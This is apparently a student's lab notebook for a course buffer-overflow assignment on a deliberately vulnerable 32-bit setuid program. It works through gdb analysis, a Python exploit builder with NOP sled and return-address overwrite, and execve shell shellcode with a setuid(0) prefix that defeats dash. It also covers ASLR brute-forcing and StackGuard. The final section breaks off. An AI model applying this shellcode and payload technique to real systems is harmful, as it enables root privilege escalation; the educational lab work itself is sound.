# Assignment 1: Buffer Overflow Attack
## Part 1: Shellcode
### <b>running `make`</b>
In the beginning, the `/shellcode` directory only has the following files:
- `call_shellcode_.c`
- `Makefile`

After running the command `make`, the command under `all` is executed. Specifically:<br><br>
&emsp;&emsp;`$  gcc -m32 -z execstack -o a32.out call_shellcode.c`

This command does the following:
- compiles `call_shellcode_.c` into at 32-bit program via the `-m32` flag
- reverses the default setting of non-executable stack via `-z execstack`
- assigns an output file where the compiled program will be stored via `-o a32.out`


With the last point, the `/shellcode` directory now has a third file: `a32.out`. This is an executable file. <br>
![title](images/make.png)<br><br>

When I execute the file, I get a normal user shell. <br>
![title](images/p1_seed.png)

### <b>running `make setuid`</b>
One thing that is straighforwardly different from the previous command is that `a32.out` is highlighted in red.<br>
![title](images/make_setuid.png) <br><br>

Nothing exciting happened either way, really. Maybe we need to examine `a32.out` using <b>`gdb`</b>??
- I added a `-g` flag in the hopes of getting some debugging information. I did not get any for both cases.

## Part 2: Launching the attack on a 32-bit program (L1)

The directory `/code` starts with the following files:
- the program `stack.c` with a buffer overflow vulnerability
- `brute-force.sh`
- `exploit.py` - my (as an attecker) program
- `Makefile` 

### Inside `Makefile`
`Makefile` is constructed such that:
- program `stack.c` is compiled as a 32-bit program
- the compiled program is saved in a file without debugging information (e.g. `stack-L1`), and in a file with (e.g. `stack-L1-dbg`) via the flag `g`
- the non-executable stack is disabled
- the StackGuard is disabled via `-fno-stack-protector`
- L1 buffer has size 100; L2 buffer has size 160. This is done via the `-DBUF-SIZE` flag.
- the ownership is changed to root, then changed to set-UID

### Debugging `stack-L1-dbg`
We're instructed to just type `make` to run both L1 and L2 excercises. However, to minimize my confusion, I start with just L1 using: <br><br>

&emsp; &emsp; `$ make stack-L1` <br><br>

> Unsure: The `ebp` register still contains the caller's `ebp` value; meaning the content of this register would still point to `dummy_function()`. We need to go to the first instruction inside `bof()` in order to update the `ebp` register such that it points to the stack frame of `bof()`.

For convenience, we are able to specifcy a breakpoint where the debugger tool `gdb` must pause. So, we set the breakpoint when the program enters `bof()`, as in line 3 in the cell below.

The following cell shows the output from <br><br>
&emsp; &emsp; `$ gdb stack-L1-dbg`

In [ ]:
Reading symbols from stack-L1-dbg...
gdb-peda$ b bof
Breakpoint 1 at 0x12ad: file stack.c, line 16.
gdb-peda$ run
Starting program: /home/seed/sse-sp24/assignment-1/code/stack-L1-dbg 
Input size: 0
[----------------------------------registers-----------------------------------]
EAX: 0xffffcb48 --> 0x0 
EBX: 0x56558fb8 --> 0x3ec0 
ECX: 0x60 ('`')
EDX: 0xffffcf30 --> 0xf7fb4000 --> 0x1e6d6c 
ESI: 0xf7fb4000 --> 0x1e6d6c 
EDI: 0xf7fb4000 --> 0x1e6d6c 
EBP: 0xffffcf38 --> 0xffffd168 --> 0x0 
ESP: 0xffffcb2c --> 0x565563ee (<dummy_function+62>:	add    esp,0x10)
EIP: 0x565562ad (<bof>:	endbr32)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x565562a4 <frame_dummy+4>:	jmp    0x56556200 <register_tm_clones>
   0x565562a9 <__x86.get_pc_thunk.dx>:	mov    edx,DWORD PTR [esp]
   0x565562ac <__x86.get_pc_thunk.dx+3>:	ret    
=> 0x565562ad <bof>:	endbr32 
   0x565562b1 <bof+4>:	push   ebp
   0x565562b2 <bof+5>:	mov    ebp,esp
   0x565562b4 <bof+7>:	push   ebx
   0x565562b5 <bof+8>:	sub    esp,0x74
[------------------------------------stack-------------------------------------]
0000| 0xffffcb2c --> 0x565563ee (<dummy_function+62>:	add    esp,0x10)
0004| 0xffffcb30 --> 0xffffcf53 --> 0x456 
0008| 0xffffcb34 --> 0x0 
0012| 0xffffcb38 --> 0x3e8 
0016| 0xffffcb3c --> 0x565563c3 (<dummy_function+19>:	add    eax,0x2bf5)
0020| 0xffffcb40 --> 0x0 
0024| 0xffffcb44 --> 0x0 
0028| 0xffffcb48 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, bof (str=0xffffcf53 "V\004") at stack.c:16
16	{
gdb-peda$

Reading symbols from stack-L1-dbg...
gdb-peda$ b bof
Breakpoint 1 at 0x12ad: file stack.c, line 16.
gdb-peda$ run
Starting program: /home/seed/sse-sp24/assignment-1/code/stack-L1-dbg 
Input size: 0
[----------------------------------registers-----------------------------------]
EAX: 0xffffcb48 --> 0x0 
EBX: 0x56558fb8 --> 0x3ec0 
ECX: 0x60 ('`')
EDX: 0xffffcf30 --> 0xf7fb4000 --> 0x1e6d6c 
ESI: 0xf7fb4000 --> 0x1e6d6c 
EDI: 0xf7fb4000 --> 0x1e6d6c 
EBP: 0xffffcf38 --> 0xffffd168 --> 0x0 
ESP: 0xffffcb2c --> 0x565563ee (<dummy_function+62>:	add    esp,0x10)
EIP: 0x565562ad (<bof>:	endbr32)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x565562a4 <frame_dummy+4>:	jmp    0x56556200 <register_tm_clones>
   0x565562a9 <__x86.get_pc_thunk.dx>:	mov    edx,DWORD PTR [esp]
   0x565562ac <__x86.get_pc_thunk.dx+3>:	ret    
=> 0x565562ad <bof>:	endbr32 
   0x565562b1 <bof+4>:	push   ebp
   0x565562b2 <bof+5>:	mov    ebp,esp
   0x565562b4 <bof+7>:	push   ebx
   0x565562b5 <bof+8>:	sub    esp,0x74
[------------------------------------stack-------------------------------------]
0000| 0xffffcb2c --> 0x565563ee (<dummy_function+62>:	add    esp,0x10)
0004| 0xffffcb30 --> 0xffffcf53 --> 0x456 
0008| 0xffffcb34 --> 0x0 
0012| 0xffffcb38 --> 0x3e8 
0016| 0xffffcb3c --> 0x565563c3 (<dummy_function+19>:	add    eax,0x2bf5)
0020| 0xffffcb40 --> 0x0 
0024| 0xffffcb44 --> 0x0 
0028| 0xffffcb48 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, bof (str=0xffffcf53 "V\004") at stack.c:16
16	{
gdb-peda$


Since `$ touch badfile` creates an empty badfile, the `printf` function says "Input size: 0". <br>

It seems that the `bof()` is in line 16 of `stack.c` given the following lines 4 AND 40: <br><br>
&emsp;&emsp;`Breakpoint 1 at 0x12ad: file stack.c, line 16.`<br><br>
&emsp;&emsp;`Breakpoint 1, bof (str=0xffffcf53 "V\004") at stack.c:16`<br><br>

Then, the command:<br><br>
&emsp;&emsp;`gdb-peda$ next`

In [ ]:
[----------------------------------registers-----------------------------------]
EAX: 0x56558fb8 --> 0x3ec0 
EBX: 0x56558fb8 --> 0x3ec0 
ECX: 0x60 ('`')
EDX: 0xffffcf30 --> 0xf7fb4000 --> 0x1e6d6c 
ESI: 0xf7fb4000 --> 0x1e6d6c 
EDI: 0xf7fb4000 --> 0x1e6d6c 
EBP: 0xffffcb28 --> 0xffffcf38 --> 0xffffd168 --> 0x0 
ESP: 0xffffcab0 ("1pUVD\317\377\377\220\325\377\367\340\263\374", <incomplete sequence \367>)
EIP: 0x565562c2 (<bof+21>:	sub    esp,0x8)
EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x565562b5 <bof+8>:	sub    esp,0x74
   0x565562b8 <bof+11>:	call   0x565563f7 <__x86.get_pc_thunk.ax>
   0x565562bd <bof+16>:	add    eax,0x2cfb
=> 0x565562c2 <bof+21>:	sub    esp,0x8
   0x565562c5 <bof+24>:	push   DWORD PTR [ebp+0x8]
   0x565562c8 <bof+27>:	lea    edx,[ebp-0x6c]
   0x565562cb <bof+30>:	push   edx
   0x565562cc <bof+31>:	mov    ebx,eax
[------------------------------------stack-------------------------------------]
0000| 0xffffcab0 ("1pUVD\317\377\377\220\325\377\367\340\263\374", <incomplete sequence \367>)
0004| 0xffffcab4 --> 0xffffcf44 --> 0x0 
0008| 0xffffcab8 --> 0xf7ffd590 --> 0xf7fd1000 --> 0x464c457f 
0012| 0xffffcabc --> 0xf7fcb3e0 --> 0xf7ffd990 --> 0x56555000 --> 0x464c457f 
0016| 0xffffcac0 --> 0x0 
0020| 0xffffcac4 --> 0x0 
0024| 0xffffcac8 --> 0x0 
0028| 0xffffcacc --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
20	    strcpy(buffer, str);       

Next, we get the address of the previous frame pointer register (`$ebp`) and the address of the beginning of the buffer (`&buffer`). Taking the difference between the two gives the <i>offset</i> between the buffer and the frame pointer. <br>
![title](images/stack-L1-dbg-distance.png)

The value of the previous frame pointer `$ebp` is `0xffffcb28`. So, the return address (RA) must be stored in `0xffffcb28 + 4`. In other words, the RA is `108+4=112` away from `&buffer`. <b>This must be the value of `ret` in `exploit.py`.</b>

### Launching the attacks
The provided `exploit.py` is a skeleton file where the payload will be prepared. The payload will be saved inside the initially-empty `badfile`. Following is the content of `explot.py`. <br>

<b>ABOUT THE CODE</b>
1. Instantiates `shellcode`, which is 27 bytes long, when inquired.
2. Instantiates `content` with 517 bytes of NOPs.
3. Replaces the last 27 bytes of `content` with `shellcode`
4. Instantiates `ret` with the new RA that would return the program to `shellcode`.
5. Instantiates `offset` which is the distance between the beginning of the buffer (`&buffer`) and the previous frame pointer (`$ebp`). 
6. Places the new RA in the part of `content` that would with the register just above the `$ebp`.
7. Writes `content` into `badfile.`

<b>CHANGE 1</b>
The object `shellcode` must be replaced with shellcode for the 32-bit program. This can be found in the `/shellcode/call_shellcode.c`. <br>

<b>CHANGE 2</b>
The object `start` is the estimate of where the shellcode will start. We know that `badfile` has size `517`. We aim to put the `shellcode` towards the end (highest address) of `badfile`. The idea is that the `shellcode` is between `start` and `517`. <br>
In Python, I took the length of the shellcode, which is 27. So, I know that the start of the shellcode must be in byte `517-27=490`.

<b>CHANGE 3</b>
The object `ret` refers to value inside the RA register. The value must be greater than `ebp` so that the program will jump to somewhere above the RA (somewhere in the NOP-sled, ideally the shellcode). <br>

Theoretically, right above the RA is the first address we can jump off to `$ebp + 8`. When I try this, it throws an "Illegal instruction".

Since we know that in `badfile`, `shellcode` starts at 490 and the RA register ends at 115, there is a difference of 374 between the two. So, I take `$ebp + 374` for `ret`. When I try this, I get to root.

<b>CHANGE 4</b>
The object `offset` is the distance between `&buffer` and RA, which we already know is `112`.<br>

![title](images/L1_exploit_changes.png)

In [80]:
def exploit(shellcode, ebp = 0xffffcb28, ret_add=8, write=False):
    import sys

    # Fill the content with NOP's
    content = bytearray(0x90 for i in range(517)) 

    ##################################################################
    # Put the shellcode somewhere in the payload
    start = len(content)-len(shellcode)       # CHANGE 2: this number (OG: 0)
    content[start:start + len(shellcode)] = shellcode

    # Decide the return address value 
    # and put it somewhere in the payload
    ret    = ebp+ret_add   # CHANGE 3: this number (OG: 0x00)
    offset = 112              # CHANGE 4: this number 

    L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
    content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') 
    ##################################################################

    if write == True:
        # Write the content to a file
        with open('badfile', 'wb') as f:
            f.write(content)

    ##################################################################
    if ret_add == 8:
        print(f'length of shellcode:\t{len(shellcode)}')
        print(f'start of shellcode:\t{start}')
        print(f'offset:\t{offset}\nL:\t{L}')
        print(f'distance between frame pointer and start of shellcode:\t{start-offset}')
    print(f'The new return address is {content[offset:offset+L]}')

In [81]:
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
             "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
             "\xd2\x31\xc0\xb0\x0b\xcd\x80"
            ).encode('latin-1')
exploit(shellcode)
# returns some error

length of shellcode:	27
start of shellcode:	490
offset:	112
L:	4
distance between frame pointer and start of shellcode:	378
The new return address is bytearray(b'0\xcb\xff\xff')


In [82]:
exploit(shellcode, ret_add=378)
# bingo!

The new return address is bytearray(b'\xa2\xcc\xff\xff')


Comparing before and after running the edited `exploit.py`, we see that was was initially empty `badfile` now has a size of `517` since we populated it.<br>
![title](images/populate_badfile.png)

## Part 4: Defeating `dash`'s countermeasure
In Part 1, when I merely ran the command `make`, I get a normal user shell with `$`. Then, in Part 2, I am able to get a root shell because `/bin/sh` points to `/bin/zsh`, which does not have a countermeasure for dissimilar effective UID (`euid`) and real UID (`uid`). <br>

In this part, we use the `dash` shell, which detects this difference and changes the `euid` to the `uid`. Before setting up for the dash shell, I test change of privileges using `make setuid` inside `/shellcode`, then executing `a32.out`.<br>
![title](images/p4_seed_to_root.png)<br>
 I am able to get a shell with root privileges `#`.<br><br>

Now, I do the following to make `/bin/sh` point back to `/bin/dash`. Then, compile `call_shellcode`, then execute `a32.out` again. This time, I do not get a root shell. <br>
![title](images/p4_seed_to_seed.png) <br><br>

To counter the countermeasure of the `dash` shell, `call_shellcode.c` must be modified such that the `setuid(0)` sysem call is invoked before executing the `execve()`. <br>
![title](images/p4_shellcode_changes.png)

Now, back to `exploit.py`, `shellcode` must be modified the same for the `setuid(0)` system call. Note that the added portion has length of 8.

In [83]:
shellcode= (
  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"      # added for setuid(0)
  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
  "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')
exploit(shellcode)
# returns Illegal instruction

length of shellcode:	35
start of shellcode:	482
offset:	112
L:	4
distance between frame pointer and start of shellcode:	370
The new return address is bytearray(b'0\xcb\xff\xff')


In [84]:
exploit(shellcode, ret_add=370)
# bingo!

The new return address is bytearray(b'\x9a\xcc\xff\xff')


I tried with the default `$ebp + 8` but it threw an `Illegal instruction` error. So, in my next trial, I used the distance between the start of the shellcode and the `ebp`, which is `370`, for the return address to be assigned to `ret`. This yielded a root shell. <br>
![title](images/p4_bingo.png)

## Part 5: Defeating address randomization
Address Space Layout Randomization (ASLR) help prevent certain types of buffer overflow attacks [[Ref]](https://docs.oracle.com/en/operating-systems/oracle-linux/6/security/ol_clp_sec.html#:~:text=kernel.randomize_va_space%20controls%20Address%20Space%20Layout%20Randomization%20%28ASLR%29%2C%20which,help%20defeat%20certain%20types%20of%20buffer%20overflow%20attacks.). At the outset of the assignment, it was disabled with:<br><br>
&emsp;&emsp; `sudo sysctl -w kernel.randomize_va_space=0`<br><br>

For this part, the ASLR is restored to its default setting: <br><br>
&emsp;&emsp; `sud0 /sbin/sysctl -w kernel.randomize_va_space=2`<br>
![title](images/p5_va2.png)<br>
The default setting randomized the position of the stack, VDSO page, shared memory regions, and data segment. The setting `1` randomizes all these, too, except the data segment.<br><br>

To get root shell by brute force, I ran the shell script `brute_force.sh`. The script goes on an infinite loop until the root shell if obtained. In my case, it ran for 4 minutes and 44 seconds, for 264481 times. For the rest of the runs, the error was always `Segmentation fault`.<br>
![title](images/p5_bingo.png)<br><br>

I did two more runs to see if the time would be the same. My hypothesis is that they would be different since the addresses are randomize. Perhaps, I got fairly lucky with my first try. Second try took 21 secs. Third try took 1 mins and 58 secs.<br>
![title](images/p5_bingo_2a.png)<br>
![title](images/p5_bingo_2b.png)<br><br>

I extended my trial by using setting `1` to see if it would take a shorter time to get root shell. First try took 3 mins and 38 secs. Second try took 38 secs.<br>
![title](images/p5_bingo_1a.png)<br>
![title](images/p5_bingo_1b.png)<br><br>

>There is marginal difference between the two cases, and the relative differences in time within each case is enough to conclude that because of the randomization, the length of waiting time is also random.

## Part 6: StackGuard protection
After disabling ASLR again, I let the StackGuard enabled (by default) by removing the `-fno-stack-protector` flag in `code/Makefile`. The attack was unsuccessful, identified as "stack smashing". The program was terminated. <br>
![title](images/p6_smash.png)<br><br>

## Part 7: Non-executable stack protection
To <br>
![title](images/p7_nx.png)